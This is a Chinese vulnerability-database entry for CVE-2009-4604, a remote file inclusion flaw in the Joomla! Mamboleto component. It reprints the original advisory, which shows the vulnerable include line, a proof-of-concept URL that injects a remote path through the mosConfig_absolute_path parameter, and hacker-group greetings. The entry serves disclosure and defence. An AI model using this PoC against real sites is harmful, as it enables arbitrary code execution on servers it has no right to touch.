Joomla! Mamboleto Component 'mamboleto.php' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118753 漏洞类型 代码注入
发布时间 2009-12-10 更新时间 2010-01-13
CVE编号 CVE-2009-4604 CNNVD-ID CNNVD-201001-075
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/10369
https://cxsecurity.com/issue/WLB-2010010166
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-075
|漏洞详情
Joomla!FernandoSoaresMamboleto(com_mamboleto)组件2.0RC3的mamboleto.php中存在PHP远程文件包含漏洞。远程攻击者可以借助mosConfig_absolute_path参数中的URL,执行任意的PHP代码。
|漏洞EXP
/**************************************************************************

[!] Mamboleto Joomla! component Remote File Include Vulneralbility
[!] Author	: Don Tukulesto (root@indonesiancoder.com)
[!] Homepage	: http://www.indonesiancoder.com
[!] Date	: December 10, 2009
[!] Tune In	: http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] Novo Mamboleto 2.0 RC3 para Joomla! 1.5.x em "legacy mode". 
    Muito mais aprimorado com dois bancos a mais  (Sicredi e Bancoob) e com um novo módulo de integração com o VirtueMart.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php

Line 123

include_once( $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php');

[ Proof of Concept ]

http://server/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

[ rm -rf yourself ] 

[>] FOR MALINGSIAL


[ some quotes ]

[+] Jack- says : why so serious ?
[+] Yadoy666 says : awas ada tukang =))
[+] arianom says : Kumpulkan Koin untuk Prita Mulyasari !!!
[+] Pathloader says : Oke lah kalau beg... beg... beg... begitu :D
[+] tiw0L says : Ojo di maem pleaseeeeee!!!
|参考资料

来源:XF
名称:mamboleto-mamboleto-file-include(54662)
链接:http://xforce.iss.net/xforce/xfdb/54662
来源:BID
名称:37280
链接:http://www.securityfocus.com/bid/37280
来源:MISC
链接:http://www.exploit-db.com/exploits/10369
来源:MISC
链接:http://packetstormsecurity.org/0912-exploits/joomlamamboleto-rfi.txt